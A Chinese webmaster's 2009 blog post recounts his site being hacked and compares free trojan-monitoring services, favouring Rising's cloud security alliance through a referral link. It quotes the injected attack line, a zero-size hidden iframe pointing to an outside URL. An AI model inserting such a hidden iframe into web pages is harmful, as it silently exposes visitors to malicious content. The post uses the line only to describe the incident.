自从开始建站,时常听到站长们说主站被黑,网页被挂马之类的无奈,每天是提心掉胆的打开自己的网站,害怕自己被黑客们盯上,中了“头奖”。
越担心什么,便发生什么,09年十一的时候正在新藏线和一群“色友”耍得开心,突然接到一个版主的电话:网站被挂马了,头一下就蒙了,一是没带笔记本,二是在新藏线找个上网的地方那是比登天还难啊。搞得兴致全无,只好提前离队返回北京。
打开电脑,发现了多了网页上多了一行代码
<iframesrc="http://www.jianpu.cn/pu/91****" height=0width=0></iframe>
可恶,就这一行代码,毁了我一个假期,五一被取消,十一也这么报废了,还好问题不是很严重,我问其他站长怎么样才能彻底解决这个问题,再折腾这么几次,我的网站也该关门大吉了,本来流量还不错,不知道这次要损失多少网友呢!!
他们也很无奈的说,做了一些服务器的安全设置,但也不能彻底解决问题,因为黑客们的战术太变化多端了。有个被黑了多次的站长朋友说现在有一些安全网站联盟提供实时检测网站安全的服务,可以申请一下他们的服务,我问他效果如何,他说你自己去试吧,我早就不玩了,心碎~~~
我收集了一下,比较可靠的有3家,而且都是免费的,支持,支持!瑞星的云安全网站联盟、金山云安全中心和360挂马监测中心,我一一申请了账号,对比下,我发现金山和360就一个预警的功能。瑞星的云安全网站联盟多做了一些工作,为站长提供木马监测报告和木马趋势报告,一开始没明白什么作用,咨询了他们的客服明白这个功能可以站长浏览自己网站的挂马历史记录和时间节点分析,赞一个,先,有了这些数据对咱们以后抵御木马的战斗很有帮助啊,当然了看你怎么利用这些数据了,这个属于高级攻略了,高手们来指点指点啊~~~
还有一点是瑞星可以在一个账号下提供多个域名的监测服务,在360我没发现这项功能,由于360的流氓历史 也对他的产品不是很信任,我虽然现在只有一个网站,但是我有计划建其他站,只是现在没精力,哼哼,先占个坑呗,反正不费啥!
经过一番比较,选择加入瑞星的“云安全网站联盟”,相信他们的专业,下面和大家分享一下我使用的一些心得,加入瑞星云安全网站联盟的方式很简单,打开这个地址
http://union.rising.com.cn/index/index.aspx?from=kingzoo
和统计工具一样,注册,提交网站,获取代码,后台查看,只是多了一步,出现问题及时通知,左侧有一个“在线帮助”按钮,点击后会进入他们的bbs,你可以在那里把你注册时出现的情况反映给瑞星,有人会帮助你解决问题,很人性化的说。
这里需要提示一下的是因为一些站长个人服务器的安全设置等原因,瑞星无法检测到的其监测代码的话,你的网站会一直显示“正在检测”,你需要把这个情况发个帖子到我上面说的那个bbs里面,让他们的工作人员给你审核通过,不然不知道什么时候才能通过啊,抵御木马,分秒必争!!
简单说一下瑞星的预警方式,瑞星共提供三种预警方式:邮件预警,站内短消息和手机短消息,我推荐全部选择,以免某些原因不能及时接收信息,不过貌似目前手机短信的功能还没开通,期待啊~~
木马监测报告和木马趋势报告这两个功能我还没机会使用,我的网站现在很安全,hoho,不会是瑞星的那头狮子把那些黑客吓跑了吧,恩,大树底下确实很凉快啊 ^_^ 希望有使用过的站长分享下哈。
先介绍这么多,关于建站的心得和经验,希望和大家多交流交流
- 1楼评论者:hanxu1900cn 于 2009-12-26 13:28 评论道:
-
很有用
